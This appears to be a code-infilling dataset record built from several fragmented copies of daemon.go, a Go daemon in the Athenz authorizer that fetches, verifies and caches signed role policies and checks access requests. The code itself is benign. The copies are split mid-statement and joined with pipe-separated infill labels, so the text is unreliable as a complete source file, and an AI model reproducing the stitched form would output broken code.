"github.com/yahoo/athenz/utils/zpe-updater/util"
"github.com/yahoojapan/athenz-authorizer/pubkey"
"golang.org/x/sync/errgroup"
)
// Policyd represent the daemon to retrieve policy data from Athenz.
type Daemon interface {
Start(context.Context) <-chan error
Update(context.Context) error
CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error
GetPolicyCache(context.Context) map[string]interface{}
}
type policyd struct {
expireMargin time.Duration // expire margin force update policy when the policy expire time hit the margin
rolePolicies gache.Gache //*sync.Map // map[<domain>:role.<role>][]Assertion
policyExpiredDuration time.Duration
refreshDuration time.Duration
//flushDur time.Duration
errRetryInterval time.Duration
pkp pubkey.Provider
etagCache gache.Gache
etagFlushDur time.Duration
etagExpTime time.Duration
// www.athenz.com/zts/v1
athenzURL string
athenzDomains []string
client *http.Client
}
type etagCache struct {
eTag string
sp *SignedPolicy
}
// New represent the constructor of Policyd
func New(opts ...Option) (Daemon, error) {
p := &policyd{
rolePolicies: gache.New(),
etagCache: gache.New(),
}
for _, opt := range append(defaultOptions, opts...) {
if err := opt(p); err != nil {
return nil, errors.Wrap(err, "error create policyd")
}
}
return p, nil
}
// Start starts the Policy daemon to retrive the policy data periodically
func (p *policyd) Start(ctx context.Context) <-chan error {
glg.Info("Starting policyd updater")
ech := make(chan error, 100)
fch := make(chan struct{}, 1)
if err := p.Update(ctx); err != nil {
glg.Debugf("Error initialize policy data, err: %v", err)
ech <- errors.Wrap(err, "error update policy")
fch <- struct{}{}
}
go func() {
defer close(fch)
defer close(ech)
p.etagCache.StartExpired(ctx, p.etagFlushDur)
ticker := time.NewTicker(p.refreshDuration)
for {
select {
case <-ctx.Done():
glg.Info("Stopping policyd updater")
ticker.Stop()
ech <- ctx.Err()
return
case <-fch:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
time.Sleep(p.errRetryInterval)
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
case <-ticker.C:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
}
}
}()
return ech
}
// Update updates and cache policy data
func (p *policyd) Update(ctx context.Context) error {
glg.Info("Updating policy")
defer glg.Info("Updated policy")
eg := errgroup.Group{}
rp := gache.New()
for _, domain := range p.athenzDomains {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
dom := domain
eg.Go(func() error {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
return p.fetchAndCachePolicy(ctx, rp, dom)
}
})
}
}
if err := eg.Wait(); err != nil {
return err
}
rp.StartExpired(ctx, p.policyExpiredDuration).
EnableExpiredHook().
SetExpiredHook(func(ctx context.Context, key string) {
//key = <domain>:role.<role>
p.fetchAndCachePolicy(ctx, p.rolePolicies, strings.Split(key, ":role.")[0])
})
p.rolePolicies, rp = rp, p.rolePolicies
rp.Stop()
rp.Clear()
return nil
}
// CheckPolicy checks the specified request has privilege to access the resources or not.
// If return is nil then the request is allowed, otherwise the request is rejected.
func (p *policyd) CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error {
ech := make(chan error, 1)
cctx, cancel := context.WithCancel(ctx)
defer cancel()
go func() {
defer close(ech)
wg := new(sync.WaitGroup)
for _, role := range roles {
dr := fmt.Sprintf("%s:role.%s", domain, role)
wg.Add(1)
go func(ch chan<- error) {
defer wg.Done()
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
asss, ok := p.rolePolicies.Get(dr)
if !ok {
return
}
for _, ass := range asss.([]*Assertion) {
glg.Debugf("Checking policy domain: %s, role: %v, action: %s, resource: %s, assertion: %v", domain, roles, action, resource, ass)
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
if strings.EqualFold(ass.ResourceDomain, domain) && ass.Reg.MatchString(strings.ToLower(action+"-"+resource)) {
ch <- ass.Effect
return
}
}
}
}
}(ech)
}
wg.Wait()
ech <- errors.Wrap(ErrNoMatch, "no match")
}()
err := <-ech
glg.Debugf("check policy domain: %s, role: %v, action: %s, resource: %s, result: %v", domain, roles, action, resource, err)
return err
}
func (p *policyd) GetPolicyCache(ctx context.Context) map[string]interface{} {
return p.rolePolicies.ToRawMap(ctx)
}
func (p *policyd) fetchAndCachePolicy(ctx context.Context, g gache.Gache, dom string) error {
spd, upd, err := p.fetchPolicy(ctx, dom)
if err != nil {
glg.Debugf("fetch policy failed, err: %v", err)
return errors.Wrap(err, "error fetch policy")
}
glg.DebugFunc(func() string {
rawpol, _ := json.Marshal(spd)
return fmt.Sprintf("fetched policy data, domain: %s,updated: %v, body: %s", dom, upd, (string)(rawpol))
})
if err = simplifyAndCachePolicy(ctx, g, spd); err != nil {
glg.Debugf("simplify and cache error: %v", err)
return errors.Wrap(err, "error simplify and cache")
}
return nil
}
func (p *policyd) fetchPolicy(ctx context.Context, domain string) (*SignedPolicy, bool, error) {
glg.Infof("Fetching policy for domain %s", domain)
// https://{www.athenz.com/zts/v1}/domain/{athenz domain}/signed_policy_data
url := fmt.Sprintf("https://%s/domain/%s/signed_policy_data", p.athenzURL, domain)
glg.Debugf("fetching policy, url: %v", url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
glg.Errorf("fetch policy error, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error creating fetch policy request")
}
// etag header
t, ok := p.etagCache.Get(domain)
if ok {
ec := t.(*etagCache)
if time.Now().Add(p.expireMargin).UnixNano() < ec.sp.SignedPolicyData.Expires.UnixNano() {
glg.Debugf("domain: %s, using etag: %s", domain, ec.eTag)
req.Header.Set("If-None-Match", ec.eTag)
}
}
res, err := p.client.Do(req.WithContext(ctx))
if err != nil {
glg.Errorf("Error making HTTP request, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error making request")
}
// if server return NotModified, return policy from cache
if res.StatusCode == http.StatusNotModified {
cache := t.(*etagCache)
glg.Debugf("Server return not modified, domain: %s, etag: %v", domain, cache.eTag)
return cache.sp, false, nil
}
if res.StatusCode != http.StatusOK {
glg.Errorf("Domain %s: Server return not OK", domain)
return nil, false, errors.Wrap(ErrFetchPolicy, "error fetching policy data")
}
// read and decode
sp := new(SignedPolicy)
if err = json.NewDecoder(res.Body).Decode(&sp); err != nil {
glg.Errorf("Error decoding policy, domain: %s, err: %v", domain, err)
return nil, false, errors.Wrap(err, "error decode response")
}
// verify policy data
if err = sp.Verify(p.pkp); err != nil {
glg.Errorf("Error verifying policy, domain: %s,err: %v", domain, err)
return nil, false, errors.Wrap(err, "error verify policy data")
}
if _, err = io.Copy(ioutil.Discard, res.Body); err != nil {
glg.Warn(errors.Wrap(err, "error io.copy"))
}
if err = res.Body.Close(); err != nil {
glg.Warn(errors.Wrap(err, "error body.close"))
}
// set eTag cache
eTag := res.Header.Get("ETag")
if eTag != "" {
glg.Debugf("Setting ETag %v for domain %s", eTag, domain)
p.etagCache.SetWithExpire(domain, &etagCache{eTag, sp}, p.etagExpTime)
}
return sp, true, nil
}
func simplifyAndCachePolicy(ctx context.Context, rp gache.Gache, sp *SignedPolicy) error {
eg := errgroup.Group{}
assm := new(sync.Map) // assertion map
// simplify signed policy cache
for _, policy := range sp.DomainSignedPolicyData.SignedPolicyData.PolicyData.Policies {
pol := policy
eg.Go(func() error {
for _, ass := range pol.Assertions {
select {
case <-ctx.Done():
return ctx.Err()
default:
km := fmt.Sprintf("%s,%s,%s", ass.Role, ass.Action, ass.Resource)
if _, ok := assm.Load(km); !ok {
assm.Store(km, ass)
} else {
// deny policy will override allow policy, and also remove duplication
if strings.EqualFold("deny", ass.Effect) {
assm.Store(km, ass)
}
}
}
}
return nil
})
}
if err := eg.Wait(); err != nil {
return errors.Wrap(err, "error simplify and cache policy")
}
// cache
var retErr error
assm.Range(func(k interface{}, val interface{}) bool {
ass := val.(*util.Assertion)
a, err := NewAssertion(ass.Action, ass.Resource, ass.Effect)
if err != nil {
glg.Debugf("error adding assertion to the cache, err: %v", err)
retErr = err
return false
}
var asss []*Assertion
r := ass.Role
if r, ok := rp.Get(r); ok | else {
asss = []*Assertion{a}
}
rp.SetWithExpire(ass.Role, asss, time.Duration(sp.DomainSignedPolicyData.SignedPolicyData.Expires.UnixNano()))
glg.Debugf("added assertion to the cache: %+v", ass)
return true
})
if retErr != nil {
return retErr
}
return nil
}
| {
asss = append(r.([]*Assertion), a)
} | conditional_block |
daemon.go | /*
Copyright (C) 2018 Yahoo Japan Corporation Athenz team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package policy
import (
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"strings"
"sync"
"time"
"github.com/kpango/gache"
"github.com/kpango/glg"
"github.com/pkg/errors"
"github.com/yahoo/athenz/utils/zpe-updater/util"
"github.com/yahoojapan/athenz-authorizer/pubkey"
"golang.org/x/sync/errgroup"
)
// Policyd represent the daemon to retrieve policy data from Athenz.
type Daemon interface {
Start(context.Context) <-chan error
Update(context.Context) error
CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error
GetPolicyCache(context.Context) map[string]interface{}
}
type policyd struct {
expireMargin time.Duration // expire margin force update policy when the policy expire time hit the margin
rolePolicies gache.Gache //*sync.Map // map[<domain>:role.<role>][]Assertion
policyExpiredDuration time.Duration
refreshDuration time.Duration
//flushDur time.Duration
errRetryInterval time.Duration
pkp pubkey.Provider
etagCache gache.Gache
etagFlushDur time.Duration
etagExpTime time.Duration
// www.athenz.com/zts/v1
athenzURL string
athenzDomains []string
client *http.Client
}
type etagCache struct {
eTag string
sp *SignedPolicy
}
// New represent the constructor of Policyd
func New(opts ...Option) (Daemon, error) {
p := &policyd{
rolePolicies: gache.New(),
etagCache: gache.New(),
}
for _, opt := range append(defaultOptions, opts...) {
if err := opt(p); err != nil {
return nil, errors.Wrap(err, "error create policyd")
}
}
return p, nil
}
// Start starts the Policy daemon to retrive the policy data periodically
func (p *policyd) Start(ctx context.Context) <-chan error {
glg.Info("Starting policyd updater")
ech := make(chan error, 100)
fch := make(chan struct{}, 1)
if err := p.Update(ctx); err != nil {
glg.Debugf("Error initialize policy data, err: %v", err)
ech <- errors.Wrap(err, "error update policy")
fch <- struct{}{}
}
go func() {
defer close(fch)
defer close(ech)
p.etagCache.StartExpired(ctx, p.etagFlushDur)
ticker := time.NewTicker(p.refreshDuration)
for {
select {
case <-ctx.Done():
glg.Info("Stopping policyd updater")
ticker.Stop()
ech <- ctx.Err()
return
case <-fch:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
time.Sleep(p.errRetryInterval)
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
case <-ticker.C:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
}
}
}()
return ech
}
// Update updates and cache policy data
func (p *policyd) Update(ctx context.Context) error {
glg.Info("Updating policy")
defer glg.Info("Updated policy")
eg := errgroup.Group{}
rp := gache.New()
for _, domain := range p.athenzDomains {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
dom := domain
eg.Go(func() error {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
return p.fetchAndCachePolicy(ctx, rp, dom)
}
})
}
}
if err := eg.Wait(); err != nil {
return err
}
rp.StartExpired(ctx, p.policyExpiredDuration).
EnableExpiredHook().
SetExpiredHook(func(ctx context.Context, key string) {
//key = <domain>:role.<role>
p.fetchAndCachePolicy(ctx, p.rolePolicies, strings.Split(key, ":role.")[0])
})
p.rolePolicies, rp = rp, p.rolePolicies
rp.Stop()
rp.Clear()
return nil
}
// CheckPolicy checks the specified request has privilege to access the resources or not.
// If return is nil then the request is allowed, otherwise the request is rejected.
func (p *policyd) CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error {
ech := make(chan error, 1)
cctx, cancel := context.WithCancel(ctx)
defer cancel()
go func() {
defer close(ech)
wg := new(sync.WaitGroup)
for _, role := range roles {
dr := fmt.Sprintf("%s:role.%s", domain, role)
wg.Add(1)
go func(ch chan<- error) {
defer wg.Done()
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
asss, ok := p.rolePolicies.Get(dr)
if !ok {
return
}
for _, ass := range asss.([]*Assertion) {
glg.Debugf("Checking policy domain: %s, role: %v, action: %s, resource: %s, assertion: %v", domain, roles, action, resource, ass)
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
if strings.EqualFold(ass.ResourceDomain, domain) && ass.Reg.MatchString(strings.ToLower(action+"-"+resource)) {
ch <- ass.Effect
return
}
}
}
}
}(ech)
}
wg.Wait()
ech <- errors.Wrap(ErrNoMatch, "no match")
}()
err := <-ech
glg.Debugf("check policy domain: %s, role: %v, action: %s, resource: %s, result: %v", domain, roles, action, resource, err)
return err
}
func (p *policyd) GetPolicyCache(ctx context.Context) map[string]interface{} {
return p.rolePolicies.ToRawMap(ctx)
}
func (p *policyd) fetchAndCachePolicy(ctx context.Context, g gache.Gache, dom string) error {
spd, upd, err := p.fetchPolicy(ctx, dom)
if err != nil {
glg.Debugf("fetch policy failed, err: %v", err)
return errors.Wrap(err, "error fetch policy")
}
glg.DebugFunc(func() string {
rawpol, _ := json.Marshal(spd)
return fmt.Sprintf("fetched policy data, domain: %s,updated: %v, body: %s", dom, upd, (string)(rawpol))
})
if err = simplifyAndCachePolicy(ctx, g, spd); err != nil {
glg.Debugf("simplify and cache error: %v", err)
return errors.Wrap(err, "error simplify and cache")
}
return nil
}
func (p *policyd) fetchPolicy(ctx context.Context, domain string) (*SignedPolicy, bool, error) {
glg.Infof("Fetching policy for domain %s", domain)
// https://{www.athenz.com/zts/v1}/domain/{athenz domain}/signed_policy_data
url := fmt.Sprintf("https://%s/domain/%s/signed_policy_data", p.athenzURL, domain)
glg.Debugf("fetching policy, url: %v", url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
glg.Errorf("fetch policy error, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error creating fetch policy request")
}
// etag header
t, ok := p.etagCache.Get(domain)
if ok {
ec := t.(*etagCache)
if time.Now().Add(p.expireMargin).UnixNano() < ec.sp.SignedPolicyData.Expires.UnixNano() {
glg.Debugf("domain: %s, using etag: %s", domain, ec.eTag)
req.Header.Set("If-None-Match", ec.eTag)
}
}
res, err := p.client.Do(req.WithContext(ctx))
if err != nil {
glg.Errorf("Error making HTTP request, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error making request")
}
// if server return NotModified, return policy from cache
if res.StatusCode == http.StatusNotModified {
cache := t.(*etagCache)
glg.Debugf("Server return not modified, domain: %s, etag: %v", domain, cache.eTag)
return cache.sp, false, nil
}
if res.StatusCode != http.StatusOK {
glg.Errorf("Domain %s: Server return not OK", domain)
return nil, false, errors.Wrap(ErrFetchPolicy, "error fetching policy data")
}
// read and decode
sp := new(SignedPolicy)
if err = json.NewDecoder(res.Body).Decode(&sp); err != nil {
glg.Errorf("Error decoding policy, domain: %s, err: %v", domain, err)
return nil, false, errors.Wrap(err, "error decode response")
}
// verify policy data
if err = sp.Verify(p.pkp); err != nil {
glg.Errorf("Error verifying policy, domain: %s,err: %v", domain, err)
return nil, false, errors.Wrap(err, "error verify policy data")
}
if _, err = io.Copy(ioutil.Discard, res.Body); err != nil {
glg.Warn(errors.Wrap(err, "error io.copy"))
}
if err = res.Body.Close(); err != nil {
glg.Warn(errors.Wrap(err, "error body.close"))
}
// set eTag cache
eTag := res.Header.Get("ETag")
if eTag != "" {
glg.Debugf("Setting ETag %v for domain %s", eTag, domain)
p.etagCache.SetWithExpire(domain, &etagCache{eTag, sp}, p.etagExpTime)
}
return sp, true, nil
}
func simplifyAndCachePolicy(ctx context.Context, rp gache.Gache, sp *SignedPolicy) error | {
eg := errgroup.Group{}
assm := new(sync.Map) // assertion map
// simplify signed policy cache
for _, policy := range sp.DomainSignedPolicyData.SignedPolicyData.PolicyData.Policies {
pol := policy
eg.Go(func() error {
for _, ass := range pol.Assertions {
select {
case <-ctx.Done():
return ctx.Err()
default:
km := fmt.Sprintf("%s,%s,%s", ass.Role, ass.Action, ass.Resource)
if _, ok := assm.Load(km); !ok {
assm.Store(km, ass)
} else {
// deny policy will override allow policy, and also remove duplication
if strings.EqualFold("deny", ass.Effect) {
assm.Store(km, ass)
}
}
}
}
return nil
})
}
if err := eg.Wait(); err != nil {
return errors.Wrap(err, "error simplify and cache policy")
}
// cache
var retErr error
assm.Range(func(k interface{}, val interface{}) bool {
ass := val.(*util.Assertion)
a, err := NewAssertion(ass.Action, ass.Resource, ass.Effect)
if err != nil {
glg.Debugf("error adding assertion to the cache, err: %v", err)
retErr = err
return false
}
var asss []*Assertion
r := ass.Role
if r, ok := rp.Get(r); ok {
asss = append(r.([]*Assertion), a)
} else {
asss = []*Assertion{a}
}
rp.SetWithExpire(ass.Role, asss, time.Duration(sp.DomainSignedPolicyData.SignedPolicyData.Expires.UnixNano()))
glg.Debugf("added assertion to the cache: %+v", ass)
return true
})
if retErr != nil {
return retErr
}
return nil
} | identifier_body | |
daemon.go | /*
Copyright (C) 2018 Yahoo Japan Corporation Athenz team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package policy
import (
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"strings"
"sync"
"time"
"github.com/kpango/gache"
"github.com/kpango/glg"
"github.com/pkg/errors"
"github.com/yahoo/athenz/utils/zpe-updater/util"
"github.com/yahoojapan/athenz-authorizer/pubkey"
"golang.org/x/sync/errgroup"
)
// Policyd represent the daemon to retrieve policy data from Athenz.
type Daemon interface {
Start(context.Context) <-chan error
Update(context.Context) error
CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error
GetPolicyCache(context.Context) map[string]interface{}
}
type policyd struct {
expireMargin time.Duration // expire margin force update policy when the policy expire time hit the margin
rolePolicies gache.Gache //*sync.Map // map[<domain>:role.<role>][]Assertion
policyExpiredDuration time.Duration
refreshDuration time.Duration
//flushDur time.Duration
errRetryInterval time.Duration
pkp pubkey.Provider
etagCache gache.Gache
etagFlushDur time.Duration
etagExpTime time.Duration
// www.athenz.com/zts/v1
athenzURL string
athenzDomains []string
client *http.Client
}
type etagCache struct {
eTag string
sp *SignedPolicy
}
// New represent the constructor of Policyd
func New(opts ...Option) (Daemon, error) {
p := &policyd{
rolePolicies: gache.New(),
etagCache: gache.New(),
}
for _, opt := range append(defaultOptions, opts...) {
if err := opt(p); err != nil {
return nil, errors.Wrap(err, "error create policyd")
}
}
return p, nil
}
// Start starts the Policy daemon to retrive the policy data periodically
func (p *policyd) Start(ctx context.Context) <-chan error {
glg.Info("Starting policyd updater")
ech := make(chan error, 100)
fch := make(chan struct{}, 1)
if err := p.Update(ctx); err != nil {
glg.Debugf("Error initialize policy data, err: %v", err)
ech <- errors.Wrap(err, "error update policy")
fch <- struct{}{}
}
go func() {
defer close(fch)
defer close(ech)
p.etagCache.StartExpired(ctx, p.etagFlushDur)
ticker := time.NewTicker(p.refreshDuration)
for {
select {
case <-ctx.Done():
glg.Info("Stopping policyd updater")
ticker.Stop()
ech <- ctx.Err()
return
case <-fch:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
time.Sleep(p.errRetryInterval)
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
case <-ticker.C:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
}
}
}()
return ech
}
// Update updates and cache policy data
func (p *policyd) Update(ctx context.Context) error {
glg.Info("Updating policy")
defer glg.Info("Updated policy")
eg := errgroup.Group{}
rp := gache.New()
for _, domain := range p.athenzDomains {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
dom := domain
eg.Go(func() error {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
return p.fetchAndCachePolicy(ctx, rp, dom)
}
})
}
}
if err := eg.Wait(); err != nil {
return err
}
rp.StartExpired(ctx, p.policyExpiredDuration).
EnableExpiredHook().
SetExpiredHook(func(ctx context.Context, key string) {
//key = <domain>:role.<role>
p.fetchAndCachePolicy(ctx, p.rolePolicies, strings.Split(key, ":role.")[0])
})
p.rolePolicies, rp = rp, p.rolePolicies
rp.Stop()
rp.Clear()
return nil
}
// CheckPolicy checks the specified request has privilege to access the resources or not.
// If return is nil then the request is allowed, otherwise the request is rejected.
func (p *policyd) CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error {
ech := make(chan error, 1)
cctx, cancel := context.WithCancel(ctx)
defer cancel()
go func() {
defer close(ech)
wg := new(sync.WaitGroup)
for _, role := range roles {
dr := fmt.Sprintf("%s:role.%s", domain, role)
wg.Add(1)
go func(ch chan<- error) {
defer wg.Done()
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
asss, ok := p.rolePolicies.Get(dr)
if !ok {
return
}
for _, ass := range asss.([]*Assertion) {
glg.Debugf("Checking policy domain: %s, role: %v, action: %s, resource: %s, assertion: %v", domain, roles, action, resource, ass)
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
if strings.EqualFold(ass.ResourceDomain, domain) && ass.Reg.MatchString(strings.ToLower(action+"-"+resource)) {
ch <- ass.Effect
return
}
}
}
}
}(ech)
}
wg.Wait()
ech <- errors.Wrap(ErrNoMatch, "no match")
}()
err := <-ech
glg.Debugf("check policy domain: %s, role: %v, action: %s, resource: %s, result: %v", domain, roles, action, resource, err)
return err
}
func (p *policyd) GetPolicyCache(ctx context.Context) map[string]interface{} {
return p.rolePolicies.ToRawMap(ctx)
}
func (p *policyd) | (ctx context.Context, g gache.Gache, dom string) error {
spd, upd, err := p.fetchPolicy(ctx, dom)
if err != nil {
glg.Debugf("fetch policy failed, err: %v", err)
return errors.Wrap(err, "error fetch policy")
}
glg.DebugFunc(func() string {
rawpol, _ := json.Marshal(spd)
return fmt.Sprintf("fetched policy data, domain: %s,updated: %v, body: %s", dom, upd, (string)(rawpol))
})
if err = simplifyAndCachePolicy(ctx, g, spd); err != nil {
glg.Debugf("simplify and cache error: %v", err)
return errors.Wrap(err, "error simplify and cache")
}
return nil
}
func (p *policyd) fetchPolicy(ctx context.Context, domain string) (*SignedPolicy, bool, error) {
glg.Infof("Fetching policy for domain %s", domain)
// https://{www.athenz.com/zts/v1}/domain/{athenz domain}/signed_policy_data
url := fmt.Sprintf("https://%s/domain/%s/signed_policy_data", p.athenzURL, domain)
glg.Debugf("fetching policy, url: %v", url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
glg.Errorf("fetch policy error, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error creating fetch policy request")
}
// etag header
t, ok := p.etagCache.Get(domain)
if ok {
ec := t.(*etagCache)
if time.Now().Add(p.expireMargin).UnixNano() < ec.sp.SignedPolicyData.Expires.UnixNano() {
glg.Debugf("domain: %s, using etag: %s", domain, ec.eTag)
req.Header.Set("If-None-Match", ec.eTag)
}
}
res, err := p.client.Do(req.WithContext(ctx))
if err != nil {
glg.Errorf("Error making HTTP request, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error making request")
}
// if server return NotModified, return policy from cache
if res.StatusCode == http.StatusNotModified {
cache := t.(*etagCache)
glg.Debugf("Server return not modified, domain: %s, etag: %v", domain, cache.eTag)
return cache.sp, false, nil
}
if res.StatusCode != http.StatusOK {
glg.Errorf("Domain %s: Server return not OK", domain)
return nil, false, errors.Wrap(ErrFetchPolicy, "error fetching policy data")
}
// read and decode
sp := new(SignedPolicy)
if err = json.NewDecoder(res.Body).Decode(&sp); err != nil {
glg.Errorf("Error decoding policy, domain: %s, err: %v", domain, err)
return nil, false, errors.Wrap(err, "error decode response")
}
// verify policy data
if err = sp.Verify(p.pkp); err != nil {
glg.Errorf("Error verifying policy, domain: %s,err: %v", domain, err)
return nil, false, errors.Wrap(err, "error verify policy data")
}
if _, err = io.Copy(ioutil.Discard, res.Body); err != nil {
glg.Warn(errors.Wrap(err, "error io.copy"))
}
if err = res.Body.Close(); err != nil {
glg.Warn(errors.Wrap(err, "error body.close"))
}
// set eTag cache
eTag := res.Header.Get("ETag")
if eTag != "" {
glg.Debugf("Setting ETag %v for domain %s", eTag, domain)
p.etagCache.SetWithExpire(domain, &etagCache{eTag, sp}, p.etagExpTime)
}
return sp, true, nil
}
func simplifyAndCachePolicy(ctx context.Context, rp gache.Gache, sp *SignedPolicy) error {
eg := errgroup.Group{}
assm := new(sync.Map) // assertion map
// simplify signed policy cache
for _, policy := range sp.DomainSignedPolicyData.SignedPolicyData.PolicyData.Policies {
pol := policy
eg.Go(func() error {
for _, ass := range pol.Assertions {
select {
case <-ctx.Done():
return ctx.Err()
default:
km := fmt.Sprintf("%s,%s,%s", ass.Role, ass.Action, ass.Resource)
if _, ok := assm.Load(km); !ok {
assm.Store(km, ass)
} else {
// deny policy will override allow policy, and also remove duplication
if strings.EqualFold("deny", ass.Effect) {
assm.Store(km, ass)
}
}
}
}
return nil
})
}
if err := eg.Wait(); err != nil {
return errors.Wrap(err, "error simplify and cache policy")
}
// cache
var retErr error
assm.Range(func(k interface{}, val interface{}) bool {
ass := val.(*util.Assertion)
a, err := NewAssertion(ass.Action, ass.Resource, ass.Effect)
if err != nil {
glg.Debugf("error adding assertion to the cache, err: %v", err)
retErr = err
return false
}
var asss []*Assertion
r := ass.Role
if r, ok := rp.Get(r); ok {
asss = append(r.([]*Assertion), a)
} else {
asss = []*Assertion{a}
}
rp.SetWithExpire(ass.Role, asss, time.Duration(sp.DomainSignedPolicyData.SignedPolicyData.Expires.UnixNano()))
glg.Debugf("added assertion to the cache: %+v", ass)
return true
})
if retErr != nil {
return retErr
}
return nil
}
| fetchAndCachePolicy | identifier_name |
daemon.go | /*
Copyright (C) 2018 Yahoo Japan Corporation Athenz team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package policy
import (
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"strings"
"sync"
"time"
"github.com/kpango/gache"
"github.com/kpango/glg"
"github.com/pkg/errors"
"github.com/yahoo/athenz/utils/zpe-updater/util"
"github.com/yahoojapan/athenz-authorizer/pubkey"
"golang.org/x/sync/errgroup"
)
// Policyd represent the daemon to retrieve policy data from Athenz.
type Daemon interface {
Start(context.Context) <-chan error
Update(context.Context) error
CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error
GetPolicyCache(context.Context) map[string]interface{}
}
type policyd struct {
expireMargin time.Duration // expire margin force update policy when the policy expire time hit the margin
rolePolicies gache.Gache //*sync.Map // map[<domain>:role.<role>][]Assertion
policyExpiredDuration time.Duration
refreshDuration time.Duration
//flushDur time.Duration
errRetryInterval time.Duration
pkp pubkey.Provider
etagCache gache.Gache | // www.athenz.com/zts/v1
athenzURL string
athenzDomains []string
client *http.Client
}
type etagCache struct {
eTag string
sp *SignedPolicy
}
// New represent the constructor of Policyd
func New(opts ...Option) (Daemon, error) {
p := &policyd{
rolePolicies: gache.New(),
etagCache: gache.New(),
}
for _, opt := range append(defaultOptions, opts...) {
if err := opt(p); err != nil {
return nil, errors.Wrap(err, "error create policyd")
}
}
return p, nil
}
// Start starts the Policy daemon to retrive the policy data periodically
func (p *policyd) Start(ctx context.Context) <-chan error {
glg.Info("Starting policyd updater")
ech := make(chan error, 100)
fch := make(chan struct{}, 1)
if err := p.Update(ctx); err != nil {
glg.Debugf("Error initialize policy data, err: %v", err)
ech <- errors.Wrap(err, "error update policy")
fch <- struct{}{}
}
go func() {
defer close(fch)
defer close(ech)
p.etagCache.StartExpired(ctx, p.etagFlushDur)
ticker := time.NewTicker(p.refreshDuration)
for {
select {
case <-ctx.Done():
glg.Info("Stopping policyd updater")
ticker.Stop()
ech <- ctx.Err()
return
case <-fch:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
time.Sleep(p.errRetryInterval)
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
case <-ticker.C:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
}
}
}()
return ech
}
// Update updates and cache policy data
func (p *policyd) Update(ctx context.Context) error {
glg.Info("Updating policy")
defer glg.Info("Updated policy")
eg := errgroup.Group{}
rp := gache.New()
for _, domain := range p.athenzDomains {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
dom := domain
eg.Go(func() error {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
return p.fetchAndCachePolicy(ctx, rp, dom)
}
})
}
}
